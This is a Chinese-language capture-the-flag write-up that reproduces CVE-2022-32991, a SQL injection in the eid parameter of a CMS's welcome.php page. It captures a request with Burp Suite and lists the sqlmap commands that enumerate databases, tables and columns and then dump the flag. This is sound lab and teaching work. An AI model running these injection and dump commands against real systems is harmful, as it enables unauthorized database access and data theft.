CVE-2022-32991靶场复现

靶场环境:

题目提示了该CMS的welcome.php中存在SQL注入攻击。

CVE官方给出的提示:

welcome.php页面存在SQL注入,并且这个参数是eid

打开靶场环境:

页面是一个登陆注册的界面

用户注册:

1

01@0.com

123456

123456

点击Register(注册)

注册成功

用户登录:

01@0.com

123456

点击Login(登录)

登陆成功:

箭头所指方向存在welcome.php文件但是参数不是eid,而是p

下方有Start开始按钮,点点试试,看看有没有新的发现


存在了eid参数

由于没有注入窗口,所以想到了,火狐+burpsuite+sqlmap组合拷打

复制带有eid参数的页面网址,用火狐浏览器打开,进行burpsuite抓包

创建一个txt文件,将数据包复制到这个txt文件里面

注入前的准备工作,了解sqlmap的部分参数

  1. -r 加载文件中的HTTP请求(本地保存的请求包txt文件)
  2. -D 选择使用哪个数据库
  3. -T 选择使用哪个表
  4. -C 选择使用哪个列
  5. --dbs 列出所有的数据库
  6. --batch 自动选择yes
  7. --tables 列出当前的表
  8. --columns 列出当前的列
  9. --dump 获取字段中的数据

启动sqlmap加载flag.txt文件HTTP请求并列出其所有数据库
进入到桌面目录下(注意这是我的flag.txt文件保存的位置)
执行如下命令:
sqlmap -r flag.txt --dbs --batch

回显如下:

可以看到存在数据库ctf(注意执行命令后,加载可能会慢点,不必慌张。)
接下来列出数据库ctf里面的所有数据表
执行如下命令:
sqlmap -r flag.txt -D ctf --tables --batch

回显如下:


可以看到数据库ctf里面存在数据表flag,猜测数据表flag里面存在flag(严谨一点)
接着爆数据表flag里面的字段
执行如下命令:
sqlmap -r flag.txt -D ctf -T flag --columns --batch

回显如下:

数据表flag里面存在字段flag
最后爆flag字段里面的内容
执行如下命令:
sqlmap -r flag.txt -D ctf -T flag -C flag --dump --batch

回显如下:

得出flag:
flag{cdadbe80-6b13-4ce7-bd86-3ff050dd36d3}

相关推荐
万联WANFLOW7 小时前
SD-WAN 控制平面高可用怎么做?SDWAN 控制器挂了,全网会发生什么
运维·网络·分布式·架构
2601_962683897 小时前
治理遗留系统中的“生肉 SQL”:一次用多模型协作优化慢查询的实战复盘
数据库·人工智能·sql
被克制了8 小时前
安全协议设计与分析(2)
网络安全·密码学·安全协议
SkyWalking中文站9 小时前
认识 Horizon UI · AI Assistant:用日常语言查询你的可观测性数据
运维·监控·自动化运维
dexi.Chi 攻城狮9 小时前
SQL层次查询语法
经验分享·笔记·sql
艾莉丝努力练剑9 小时前
OpenCode AI 编程:Ubuntu 24.04 环境安装与使用指南
linux·服务器·网络·人工智能·tcp/ip·ubuntu
华山令狐虫9 小时前
DBAPI AI 写 SQL:支持动态 SQL 与参数占位符,自然语言一键生成
数据库·人工智能·sql·dbapi
崇山峻岭之间10 小时前
Keil5输出hex转换为bin的设置
linux·运维·服务器
云水一下10 小时前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型
Hoxy.R10 小时前
KingbaseES读写分离高可用集群扩容、备库重建与故障切换实战
运维·数据库